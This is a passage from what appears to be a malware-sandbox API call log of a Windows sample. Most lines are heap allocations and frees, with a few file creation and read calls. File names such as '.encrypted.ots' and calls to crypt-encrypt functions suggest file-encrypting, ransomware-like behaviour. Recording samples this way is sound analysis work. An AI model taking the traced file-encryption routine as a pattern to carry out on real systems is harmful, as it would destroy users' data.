Size=0x10) returned 0x8895c8 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.196] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.197] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.encrypted.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\orvajyb.encrypted.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0030.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.199] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.199] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x2639, lpOverlapped=0x0) returned 1 [0030.199] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2639) returned 0x7c7968 [0030.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2639) returned 0x8affc0 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7968 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.200] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2639) returned 0x7c7968 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7968 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.200] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.201] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.201] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2639) returned 0x7c7968 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2639) returned 0x8b2608 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.202] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.202] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.203] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da158 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.203] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.204] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0030.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.205] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.205] RtlAllocateHeap 